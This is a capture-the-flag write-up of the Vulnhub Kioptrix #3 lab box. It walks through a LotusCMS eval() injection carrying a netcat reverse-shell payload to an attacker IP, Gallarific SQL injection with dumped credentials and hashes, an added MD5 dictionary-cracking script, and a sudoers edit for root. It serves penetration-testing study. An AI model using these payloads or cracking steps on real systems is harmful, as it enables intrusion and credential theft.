Vulnhub - Kioptrix #3 Writeup
Enumeration
Let's add kioptrix3.com to /etc/hosts and start off with Nmap.
Nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-03 16:34 IST
Nmap scan report for 192.168.71.130
Host is up (0.0026s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:93:F2:E6 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.25 seconds
Browsing around and running dirb turned up some interesting URLs:
http://kioptrix3.com/phpmyadmin/
http://kioptrix3.com/gallery/gadmin/
http://kioptrix3.com/index.php?system=Admin
There are a lot of ways to compromise this system. I will go through the ones I found.
User Shell Method 1 (Lotus CMS RCE)
The web server is running LotusCMS. A quick searchsploit query turns up an RCE:
Searchsploit
kali@kali:~$ searchsploit lotuscms
LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit) | exploits/php/remote/18565.rb
It's a Metasploit module. However, since the use of Metasploit is limited during the OSCP, I exploited it without Metasploit.
Understanding LotusCms RCE
This module exploits a vulnerability found in Lotus CMS 3.0's Router() function. This is done by embedding PHP code in the 'page' parameter, which will be passed to an eval call, therefore allowing remote code execution.
The value of 'page' ends up inside a single-quoted string in an expression that is handed to eval(). Appending '); closes that string and the enclosing call, so whatever PHP we put after it is executed; a trailing // comments out the rest of the original expression so the code still parses.
A reverse shell can be obtained by requesting the following URL (URL-encode it, or let the browser or curl do so, since the quotes, semicolons and spaces are not valid in a URL as-is):
kioptrix3.com/index.php?page=index');exec("nc -e /bin/bash 192.168.174.3 1234"); //
Set up a nc listener to catch the connection, then use Python's pty module to spawn a pseudo-terminal on the shell:
kali@kali:~$ nc -lvp 1234
listening on [any] 1234 ...
connect to [192.168.174.3] from kioptrix3.com [192.168.174.5] 34305
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Kioptrix3:/home/www/kioptrix3.com$
Low Shell Enumeration
There is a file named gconfig.php in /home/www/kioptrix3.com/gallery that contains the database credentials (note that the gallery connects to MySQL as root):
www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$ cat gconfig.php
cat gconfig.php
-------output snipped---------------
$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
-------output snipped---------------
These credentials also work for phpMyAdmin, where the gallery database holds the password hashes for dreg and loneferret. Once the hashes are cracked, the passwords can be used to SSH into the box.

User Shell Method 2 (SQL Injection)
The gallery is running Gallarific, which has a SQL injection in the id parameter of gallery.php. Appending a single quote to the id value in the following URL triggers it:
http://kioptrix3.com/gallery/gallery.php?id=1%27&sort=filename#photos

The SQL error in the response shows that the parameter is injectable. Let's dump the database with sqlmap:
SqlMap
Database: gallery
Table: dev_accounts
[2 entries]
+----+----------------------------------+------------+
| id | password | username |
+----+----------------------------------+------------+
| 1 | 0d3eccfb887aabd50f243b3f155c0f85 | dreg |
| 2 | 5badcaf789d3d1d09794d8f021f40f0e | loneferret |
+----+----------------------------------+------------+
Database: gallery
Table: gallarific_users
[1 entry]
+--------+---------+---------+---------+----------+----------+----------+----------+-----------+-----------+------------+-------------+
| userid | email | photo | website | joincode | lastname | password | username | usertype | firstname | datejoined | issuperuser |
+--------+---------+---------+---------+----------+----------+----------+----------+-----------+-----------+------------+-------------+
| 1 | <blank> | <blank> | <blank> | <blank> | User | n0t7t1k4 | admin | superuser | Super | 1302628616 | 1 |
sqlmap found the password hashes for dreg and loneferret in dev_accounts, plus the Gallarific admin login (admin / n0t7t1k4, stored in plaintext) in gallarific_users.
The dev_accounts hashes are 32 hex characters with no salt, which is what a plain MD5 hash looks like, so they can be cracked with rainbow tables or by brute force.
Crackstation (Rainbow Table Attack)
We can crack the hashes with an online rainbow table cracker such as CrackStation.

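An offline alternative to the online lookup, as an added example that is not part of the original writeup: a small dictionary attack with a few mangling rules. The wordlist below is a constructed one for illustration; against the real hashes you would point it at something like rockyou.txt.

```python
"""Offline dictionary attack on the dev_accounts hashes.  Added example, not
from the writeup; WORDLIST is a small constructed list."""
import hashlib

HASHES = {   # straight from the sqlmap dump above
    "dreg": "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
}

# constructed sample; replace with a real wordlist file
WORDLIST = ["password", "123456", "qwerty", "letmein", "starwars", "welcome", "admin"]


def is_unsalted_md5(h: str) -> bool:
    """32 hex chars with no salt or prefix: what lookup tables eat for breakfast."""
    return len(h) == 32 and all(c in "0123456789abcdef" for c in h.lower())


def md5_hex(word: str) -> str:
    return hashlib.md5(word.encode()).hexdigest()


def mangle(word: str):
    """A few cheap rule-style variants; real crackers apply hundreds."""
    yield word
    yield word.capitalize()
    yield word.upper()
    for suffix in ("1", "123", "!"):
        yield word + suffix
        yield word.capitalize() + suffix


def crack(hashes: dict, words, rules: bool = True) -> dict:
    """Return {user: plaintext} for every hash matched by a candidate.

    Unsalted MD5 means one digest per candidate covers every user at once:
    hash the word, look it up against all targets.  Salting is exactly what
    would break this shortcut.
    """
    targets = {h.lower(): user for user, h in hashes.items() if is_unsalted_md5(h)}
    found = {}
    for word in words:
        for cand in (mangle(word) if rules else (word,)):
            user = targets.get(md5_hex(cand))
            if user and user not in found:
                found[user] = cand
        if len(found) == len(targets):
            break
    return found


def load_wordlist(path: str):
    """Stream a wordlist file (e.g. rockyou.txt) without reading it all into memory."""
    with open(path, "r", encoding="latin-1") as fh:
        for line in fh:
            yield line.rstrip("\n")


if __name__ == "__main__":
    for user, pw in crack(HASHES, WORDLIST).items():
        print(f"{user}:{pw}")
```

Whatever this small list leaves uncracked needs a real wordlist and more rules; hashcat mode 0 (raw MD5) with rockyou and a rule file is the usual next step.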
Root Shell
After SSHing in as loneferret, there is a file named CompanyPolicy.README in the home directory with the following text:
loneferret@Kioptrix3:/home/loneferret# cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO
So we can run sudo ht. ht is a text editor, and since it runs as root we can use it to gain root in any of these ways:
- edit the sudoers file
- add our SSH key to root's authorized_keys
- change the password file
Since the first is the easiest, let's do it that way.
Before using ht we have to set the TERM environment variable to xterm (it refuses to start without a known terminal type):
loneferret@Kioptrix3:/home/loneferret# export TERM=xterm
So let's open /etc/sudoers with sudo ht and add /bin/sh to loneferret's entry.

And we are root!
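To make the sudoers edit concrete, here is an added example (not code from the writeup) that parses user specs the way sudoers(5) lays them out and shows what loneferret's entry grants before and after /bin/sh is added. The sudoers text is constructed, the loneferret line is a hypothetical stand-in for the box's real entry, and the ROOT_EQUIVALENT set is an illustrative list of binaries that hand over root when run with sudo.

```python
"""Parse sudoers user specs and compare a user's grants before/after an edit.
Added example, not from the writeup; SUDOERS_BEFORE is constructed and the
loneferret line is hypothetical."""
import re

SUDOERS_BEFORE = """\
# constructed sample, not the real /etc/sudoers
Defaults env_reset
root       ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
"""
# what the line looks like after adding /bin/sh with ht
SUDOERS_AFTER = SUDOERS_BEFORE.replace("/usr/local/bin/ht", "/usr/local/bin/ht, /bin/sh")

# illustrative: anything here run as root gives a shell or writes arbitrary files
ROOT_EQUIVALENT = {"/bin/sh", "/bin/bash", "/usr/local/bin/ht",
                   "/usr/bin/vi", "/usr/bin/vim", "ALL"}

SPEC = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAGS = re.compile(r"^(?:(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):\s*)+")


def parse_user_specs(text: str) -> list:
    """Flatten ``user host=(runas) [TAG:] cmd, cmd`` lines into one dict per command."""
    specs = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = SPEC.match(line)
        if not m:
            continue          # aliases and #include lines are out of scope here
        nopasswd = False
        for raw in m["cmds"].split(","):
            raw = raw.strip()
            t = TAGS.match(raw)
            if t:
                # a tag applies to this and every following command in the list
                found = re.findall(r"(NOPASSWD|PASSWD):", t.group(0))
                if found:
                    nopasswd = found[-1] == "NOPASSWD"
                raw = raw[t.end():]
            denied = raw.startswith("!")
            specs.append({
                "user": m["user"], "host": m["host"],
                "runas": m["runas"] or "root",
                "cmd": raw.lstrip("!"), "nopasswd": nopasswd, "denied": denied,
            })
    return specs


def allowed_commands(text: str, user: str) -> set:
    return {s["cmd"] for s in parse_user_specs(text)
            if s["user"] == user and not s["denied"]}


def root_equivalent(text: str, user: str) -> set:
    """Allowed commands that are as good as root."""
    return allowed_commands(text, user) & ROOT_EQUIVALENT


if __name__ == "__main__":
    for label, txt in (("before", SUDOERS_BEFORE), ("after", SUDOERS_AFTER)):
        print(label, sorted(allowed_commands(txt, "loneferret")),
              "root-equivalent:", sorted(root_equivalent(txt, "loneferret")))
```

Two things worth noting from the output: the `!/usr/bin/su` negation buys nothing once an editor runs as root (sudoers(5) itself warns that command negation is not a security boundary), and `sudo -l` on the box is the quick way to see the real entry before reaching for the editor.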
Afterthoughts
This box was comparatively easy to root. But that was not the case for me. This was because I failed to enumerate the box properly. Once I found a possible exploit, I immediately abandoned further enumeration and focused on that method alone, ended up getting stuck and had to look for hints. So I have learned a very important lesson from this box: enumeration is the most important step.
There seems to be a kernel exploit available for this box, but I did not try that out.
Further reading
- Manual SQL injection. Can't use sqlmap during the OSCP
- Structure of the sudoers file
- Autorecon. An excellent tool for automating enumeration
